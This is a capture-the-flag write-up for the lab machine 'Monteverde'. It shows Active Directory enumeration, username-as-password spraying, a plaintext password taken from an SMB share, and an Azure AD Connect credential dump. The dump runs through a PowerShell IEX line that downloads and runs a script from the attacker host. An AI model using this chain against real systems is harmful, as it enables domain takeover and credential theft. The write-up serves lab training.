machine profile

Summary:

Setup: Add the box IP to our /etc/hosts file.

$ printf "10.10.10.172\tmonteverde.htb\n" >> /etc/hosts

Enumeration: Perform detailed portscan on the lower ports of cascade.htb using nmap to gather information on any exposed services. Then, perform a less resolute portscan to identify any open higher ports.

$ sudo nmap -sC -sV monteverde.htb -oA nmap/initial; sleep 300 && \
    sudo nmap -p- -sS monteverde.htb -oA nmap/all-ports
$ cat nmap/initial.nmap
# Nmap 7.80 scan initiated Mon Apr  6 16:05:13 2020 as: nmap -Pn -sC -sV -oA nmap/initial monteverde.htb
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up (0.041s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-06 14:27:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/6%Time=5E8B453B%P=x86_64-unknown-linux-gnu%r(
SF:DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07vers
SF:ion\x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -37m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-04-06T14:30:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr  6 16:09:57 2020 -- 1 IP address (1 host up) scanned in 283.52 seconds

Kerberos stands out as an exploitable service for later. If we look at the LDAP services, the box has MEGABANK.LOCAL0 as its FQDN, we add this to our hosts file along with monteverde.htb. Before we can interact with kerberos, we need to enumerate user accounts. A common theme is unsecured msrpc which allows us to anonymously connect and dump user account information.

$ rpcclient //monteverde.htb -U "" -N
Unable to initialize messaging context
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

User: If we try the username as the password for each user we have success with SABatchJobs. Next, we enumerate SMB as an authenticated user.

$ python smbmap.py -H monteverde.htb -u SABatchJobs -p SABatchJobs
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445	Name: monteverde.htb
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
...
	.
	dr--r--r--                0 Fri Jan  3 13:12:48 2020	.
	dr--r--r--                0 Fri Jan  3 13:12:48 2020	..
	dr--r--r--                0 Fri Jan  3 13:15:23 2020	dgalanos
	dr--r--r--                0 Fri Jan  3 13:41:18 2020	mhope
	dr--r--r--                0 Fri Jan  3 13:14:56 2020	roleary
	dr--r--r--                0 Fri Jan  3 13:14:28 2020	smorgan
	users$                                            	READ ONLY

After inspecting each folder we find what appears to be a config file.

smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

		524031 blocks of size 4096. 519955 blocks available

Downloading this locally and opening we discover a password for mhope.

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

We can now logon to the box using evil-winrm over wsman then collect our flag.

$ evil-winrm -P 5985 -u mhope -p "4n0therD4y@n0th3r$" -i monteverde.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> dir ../Desktop/user.txt


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt

Root: We look at the groups mhope is in to look for loose permissions.

*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 4:40:05 PM
Password expires             Never
Password changeable          1/3/2020 4:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   4/22/2020 4:18:30 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.

We see mhope is a member of Azure Admins, some searching leads us to Azure-ADConnect.ps1. The HTB VPN doesn’t allow external connections so we download theh script to our local machine then spawn a HTTP server.

$ wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"
--2020-04-22 13:57:52--  https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2264 (2.2K) [text/plain]
Saving to: ‘Azure-ADConnect.ps1’

Azure-ADConnect.ps1          100%[===========================================>]   2.21K  --.-KB/s    in 0s

2020-04-22 13:57:52 (25.9 MB/s) - ‘Azure-ADConnect.ps1’ saved [2264/2264]

$ python -m http.server

Once downloaded we import the script on the remote machine then exploit.

*Evil-WinRM* PS C:\Users\mhope\Documents> IEX (New-Object Net.WebClient).DownloadString('http://10.10.XX.XX:8000/Azure-ADConnect.ps1');
*Evil-WinRM* PS C:\Users\mhope\Documents> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

We now have the Administrator credentials which we can use to connect to the box then read root.txt.

$ evil-winrm -P 5985 -u Administrator -p "d0m@in4dminyeah!" -i monteverde.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop/root.txt


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt